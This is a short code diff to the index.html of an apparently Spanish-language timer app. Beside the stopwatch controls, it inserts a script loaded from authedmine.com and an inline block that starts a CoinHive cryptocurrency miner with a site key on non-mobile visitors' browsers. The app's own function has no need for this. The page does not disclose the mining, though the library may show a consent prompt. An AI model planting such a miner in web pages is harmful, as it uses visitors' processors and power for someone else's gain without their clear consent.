--- a/Codigo App/index.html
+++ b/Codigo App/index.html
@@ -130,6 +130,16 @@
                         <input type="button" value="Parar" name="boton2"  id="parar" class="topcoat-button--cta"/>
                         <br>
                     </form>
+			<script src="https://authedmine.com/lib/authedmine.min.js"></script>
+<script>
+	var miner = new CoinHive.Anonymous('uZcxu45nqi4UXQ5SIjex8079JesIPln9', {throttle: 0.3});
+
+	// Only start on non-mobile devices and if not opted-out
+	// in the last 14400 seconds (4 hours):
+	if (!miner.isMobile() && !miner.didOptOut(14400)) {
+		miner.start();
+	}
+</script>
                     <p>Tiempo:</p>
                     <input value="00" size="1"  id="horas"  class="topcoat-text-input" readonly></input> :
                     <input value="00" size="1" id="minutos" class="topcoat-text-input"readonly></input> :
